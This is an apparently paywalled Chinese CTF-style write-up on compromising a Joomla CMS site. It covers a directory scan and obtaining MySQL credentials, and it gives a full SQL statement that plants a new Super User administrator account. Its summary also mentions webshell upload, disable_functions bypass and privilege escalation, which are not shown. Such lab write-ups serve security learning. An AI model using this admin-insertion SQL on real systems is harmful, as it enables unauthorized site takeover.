本来是个域渗透,不过环境有问题,就当作web题在做了
解题过程
这是一个joomla cms
-
我们先扫一下目录

-
连接mysql
得到MySQL的账号和密码

然后创建新的管理员INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8')
JoomlaCMS渗透实战

本文详细介绍了通过JoomlaCMS进行渗透测试的过程,包括利用漏洞获取MySQL账号密码、创建管理员账户、上传并利用webshell,以及如何绕过disable_function限制执行系统命令,最终实现提权。
最低0.47元/天 解锁文章
969

被折叠的 条评论
为什么被折叠?



